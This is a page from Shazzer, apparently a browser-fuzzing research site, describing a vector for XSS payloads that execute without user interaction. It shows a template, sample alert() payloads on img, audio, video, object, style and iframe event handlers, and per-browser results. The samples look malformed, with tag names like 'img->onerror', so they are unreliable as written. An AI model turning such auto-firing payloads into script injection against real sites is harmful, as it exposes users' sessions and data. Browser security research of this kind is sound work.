Shazzer logo
    • Home
    • Blog
      • Blog home
      • RSS
    • Login
    • Vectors
      • New vector
      • All Vectors
      • Cheat sheets
      • Browser diffs
      • RSS
    • Unicode table
    • Help
    • Home
    • Blog
      • Blog home
      • RSS
    • Login
    • Vectors
      • New vector
      • All Vectors
      • Cheat sheets
      • Browser diffs
      • RSS
    • Unicode table
    • Help
    Shazzer logo

    Shazzer
    Shared online fuzzer

    Fuzzing browsers since 2012

    Made by Gareth Heyes
    Follow me on Twitter: @garethheyes

    Javascript for hackers!

    Hackvertor logo
    The Spanner logo

    If you liked this, you may also like Hackvertor, The Spanner

    New users
    shihebamrimemorypuddingdaanbreurs2ongmomixel34p303sectiag0-infosecurcqplusaeiatxiiiEricKhosrolifeofal3afNikolam96r3dg33kjordyvquiqui74AyushXthaAlkmaliTightropeMonkeymaliciousgroupElnatty
    Popular users
    hackvertor (35)renniepak (8)albinowax (5)joaxcar (5)JorianWoltjer (4)0x999-x (4)RenwaX23 (3)masatokinugawa (3)d0ge (2)freddyb (1)hansmach1ne (1)ThomasOrlita (1)DreyAnd (1)B-i-t-K (1)koto (1)jonathann403 (1)securaji (1)InsertScript (1)K4r1it0 (1)sqjor (1)
    Recently updated vectors
    Characters allowed javascript and colonCharacters that can break out of a single line commentCharacters that can precede the javascript protocolCharacters allowed in-between operatorsFuzzing weird script behaviour after script textURL domain dot alternatives< removal bypassXSS vectors that consume tagUnicode characters with a decomposition of 2+ ASCII characters and are registerable domainsCharacters allowed inside javascript protocol and still returns the hostnameCharacters ignored following slash in self closing tagCharacters cause self closing tagNamed HTML entities that can be closed with !Closing title tag name separators
    New vectors
    Closing title tag name separatorsmasato - braves parsing finding entity testmasato - braves parsing finding valid charactersmasato - braves parsing finding valid attributesmasato - braves parsing findingNamed HTML entities that can be closed with !Characters cause self closing tagCharacters ignored following slash in self closing tagCharacters allowed inside javascript protocol and still returns the hostnameCharacters allowed after a bigintCharacters allowed either side of a variable assignmentCharacters allowed after throw statementencodeURI() not encoded with %Characters encoded by escape()Characters encoded by encodeURI()Characters encoded by encodeURIComponent()Characters before custom tagInjection in src attribute PORT, characters that change hostnameCharacters appended at the end of PORT within URL, which yield a different HOSTCharacters allowed as a tag name using DOM APIs
    Most popular
    URL domain dot alternatives (5.2k)Characters between < and element name (4.6k)DOM element relationships (4.4k)Characters allowed between hostname and / but don't change the hostname (4.3k)Characters that can precede the javascript protocol (4.3k)Characters allowed javascript and colon (4.2k)JavaScript Scheme starting with https:// (4.2k)Characters allowed javascript and colon copy2 (4.1k)< removal bypass (3.8k)characters allowed between exclamation mark and greater then (3.6k)HTML entities that create ASCII characters inside a JavaScript URL (3.4k)Characters that close or encapsulate HTML attribute values (3.2k)Entities that cause an external URL before @ (3k)Character that closes HTML tag (2.9k)Characters allowed between multiple HTML attributes (2.8k)Includes Validation Chars Allowed (2.7k)XSS vectors that consume tag (2.7k)Characters that cause exceptions when URL encoded (2.6k)Characters allowed after hostname but don't change the hostname (2.5k)Tags that get reordered in the DOM (2.4k)
    Most liked
    URL domain dot alternatives (5)Entities that cause an external URL before @ (4)HTML entities that create ASCII characters inside a JavaScript URL (4)JavaScript Scheme starting with https:// (4)Characters allowed between hostname and / but don't change the hostname (4)Characters that cause an external URL before @ (3)Characters allowed javascript and colon (3)Characters that can precede the javascript protocol (3)Characters allowed after hostname but don't change the hostname (2)Characters that cause exceptions when URL encoded (2)Characters allowed between multiple HTML attributes (2)Properties that contain URLs (2)Unicode characters that get normalized into path traversal characters (2)Characters that can start an HTML comment (2)HTML elements that are self closing or different text content (2)Characters appended at the end of TLD within URL, which yield in the same Origin (2)Characters allowed in-between operators (2)Characters that can be used as valid labels in JavaScript (2)Characters allowed after optional chaining (2)All events on window (1)

    XSS vectors that execute automatically

    Safari logo 5
    Firefox logo 5
    Chrome logo 7

    This vector shows which events fire without user interaction

    Created by: hackvertor

    Created on: Wednesday, April 17, 2024 at 6:18:25 PM

    Updated on: Sunday, May 25, 2025 at 12:36:54 AM

    Error! Fuzz failed. Check the console.
    Fuzz complete. Check the console. Found 0 results
    Fuzzing...

    Error!
    Tweet
    Error!

    Vector type: XSS

    Vector charset: UTF-8

    Vector data 1: html

    Vector data 2: events

    Template used:
    <$[data1] src=1 srcdoc=1 data=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]>
    <$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]>
    Your browser was detected as:
    Detecting... Detecting... Detecting... Detecting...

    Sample payloads

    <img->onerror src=1 srcdoc=1 data=1 href=1 ="alert('img->onerror->')"></img->onerror>
    <img->onerror ="alert('img->onerror->')"></img->onerror>
    <audio->onerror src=1 srcdoc=1 data=1 href=1 ="alert('audio->onerror->')"></audio->onerror>
    <audio->onerror ="alert('audio->onerror->')"></audio->onerror>
    <audio->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('audio->onloadstart->')"></audio->onloadstart>
    <audio->onloadstart ="alert('audio->onloadstart->')"></audio->onloadstart>
    <video->onerror src=1 srcdoc=1 data=1 href=1 ="alert('video->onerror->')"></video->onerror>
    <video->onerror ="alert('video->onerror->')"></video->onerror>
    <video->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('video->onloadstart->')"></video->onloadstart>
    <video->onloadstart ="alert('video->onloadstart->')"></video->onloadstart>
    <object->onerror src=1 srcdoc=1 data=1 href=1 ="alert('object->onerror->')"></object->onerror>
    <object->onerror ="alert('object->onerror->')"></object->onerror>
    <style->onload src=1 srcdoc=1 data=1 href=1 ="alert('style->onload->')"></style->onload>
    <style->onload ="alert('style->onload->')"></style->onload>
    <iframe->onload src=1 srcdoc=1 data=1 href=1 ="alert('iframe->onload->')"></iframe->onload>
    <iframe->onload ="alert('iframe->onload->')"></iframe->onload>

    Fuzz results

    Safari logo
    Safari 17.4.1 Unknown Unknown

    Updated

    Wed Apr 17 2024
    Found 5 results
    Loading...
    Firefox logo
    Firefox 125.0 Unknown Unknown

    Updated

    Thu Apr 18 2024
    Found 5 results
    Loading...
    Chrome logo
    Chrome 124.0.0.0 Unknown Unknown

    Updated

    Wed Apr 24 2024
    Found 7 results
    Loading...